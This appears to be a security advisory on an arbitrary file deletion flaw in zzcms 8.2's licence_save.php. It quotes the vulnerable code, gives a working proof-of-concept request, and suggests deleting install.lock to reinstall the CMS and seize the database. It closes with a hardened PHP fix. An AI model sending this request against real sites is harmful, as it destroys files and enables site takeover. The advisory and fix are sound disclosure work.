user/licence_save.php
Version: zzcms 8.2
Location: /user/licence_save.php
Code (line 31):
    // $oldimg is taken from the request without any validation
    if ($oldimg<>$img && $oldimg<>"/image/nopic.gif"){
        // original image: path is built directly from the user-supplied value
        $f="../".$oldimg;
        if (file_exists($f)){
            unlink($f);
        }
        // thumbnail: same unvalidated value, with "_small" inserted before the extension
        $fs="../".str_replace(".","_small.",$oldimg)."";
        if (file_exists($fs)){
            unlink($fs);
        }
    }
Impact
Allows an attacker to delete arbitrary files.
Cause
From the code it is clear that $oldimg is the only attacker-controlled input, and it is used without any filtering.
Steps to reproduce:
First create test.php.
Then perform the modify operation, making sure the condition $oldimg<>$img && $oldimg<>"/image/nopic.gif" is satisfied.
Then submit the request.
test.php is now gone.
PoC
GET:
http://127.0.0.1:8080/user/licence_save.php?action=modify
POST:
id=11&oldimg=test.php&img=1231
An attacker can use this vulnerability to delete any file, for example deleting install.lock so that the CMS can be reinstalled and the website database hijacked.
Solution
Filter the attacker-controllable input parameters: strictly restrict the parameter's type and the allowed file suffix, so that only an image path inside the upload directory can ever reach unlink().
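The following is an added example of the hardened form the solution describes; it is not zzcms code. It assumes that uploaded images live under ../image/ relative to the script and that stored image paths look like "/image/<name>.<ext>" (the function name, the allow-list regex and the $uploadRoot parameter are assumptions). The value is first checked against an allow-list of shape and suffix, then resolved with realpath() and confirmed to stay inside the upload root, and only then deleted; the thumbnail name is derived from the validated value, not from raw input.

```php
<?php
// Added example, not part of zzcms: hardened replacement for the unlink() logic.
// Assumptions: $uploadRoot is the directory containing image/ (e.g. ".."),
// and $oldimg is expected to look like "/image/<name>.<ext>".
function safe_delete_old_image(string $oldimg, string $img, string $uploadRoot): bool
{
    // Same guard as the original: unchanged or placeholder images are left alone.
    if ($oldimg === $img || $oldimg === "/image/nopic.gif") {
        return false;
    }

    // 1. Allow-list the value: a relative path under image/, a single
    //    image extension, no directory separators or ".." components.
    $rel = ltrim($oldimg, '/');
    if (!preg_match('#^image/[A-Za-z0-9_\-]+\.(jpg|jpeg|png|gif)$#i', $rel)) {
        return false; // anything else (test.php, ../install.lock, ...) is rejected
    }

    // 2. Canonicalise both sides and make sure the target is still inside
    //    the upload root (covers symlinks and any normalisation surprises).
    $root = realpath($uploadRoot);
    $f    = realpath($uploadRoot . '/' . $rel);
    if ($root === false || $f === false
        || strpos($f, $root . DIRECTORY_SEPARATOR . 'image' . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }

    $deleted = false;
    if (is_file($f)) {          // is_file(): never unlink() a directory or special file
        $deleted = unlink($f);
    }

    // 3. Thumbnail: derived from the already validated name (exactly one dot,
    //    so str_replace() touches only the extension boundary).
    $fs = $root . '/' . str_replace('.', '_small.', $rel);
    if (is_file($fs)) {
        unlink($fs);
    }
    return $deleted;
}

// Usage at the original call site: $deleted = safe_delete_old_image($oldimg, $img, "..");
```

With this check in place, a request carrying oldimg=test.php or a path with ../ is rejected at the regex step before any filesystem call, and even a value that passes the regex cannot escape the image/ directory because the realpath() prefix test runs against the canonical path.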